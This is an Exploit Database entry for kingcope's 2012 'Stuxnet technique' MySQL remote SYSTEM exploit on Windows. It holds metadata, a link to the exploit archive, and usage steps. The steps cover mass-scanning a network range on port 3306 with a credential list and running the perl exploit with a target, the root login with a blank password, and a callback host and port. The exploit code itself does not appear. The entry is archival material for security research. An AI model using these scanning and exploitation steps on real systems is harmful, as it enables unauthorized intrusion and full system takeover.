MySQL - 'Stuxnet Technique' Windows Remote System
Author: kingcope
type: remote
platform: windows
port:
date_added: 2012-12-02
date_updated: 2017-10-04
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23083.zip
use this on a fast scan server!
How to use.
pnscan:
the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".
#make lnx
#./pnscan 192.168.0.0/16 3306
exploit:
#perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555
user root on windows will mostly succeed.
/Kingcope